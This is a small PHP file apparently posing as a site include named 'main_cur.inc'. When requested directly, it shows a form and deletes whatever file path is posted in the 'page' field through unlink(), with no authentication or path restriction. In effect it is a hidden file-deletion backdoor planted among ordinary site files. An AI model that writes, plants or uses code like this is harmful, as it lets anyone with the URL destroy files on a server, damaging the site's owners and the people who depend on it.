<?php


$sp=array_reverse(explode("/",$_SERVER['REQUEST_URI']));


if($sp[0]=='main_cur.inc' || $sp[0]=='main_cur.inc.php')


{


	if($_POST)


	{


		$jk=unlink($_POST['page']);


		if($jk)


		{


			echo "Success";	


		}


		else


		{


			echo "Error";	


		}


	}


?>


<form id="frm" method="post" action="">


<input type="text" name="page" id="page" />


<input type="submit" name="submit" value="submit" />


</form>





<?php } ?>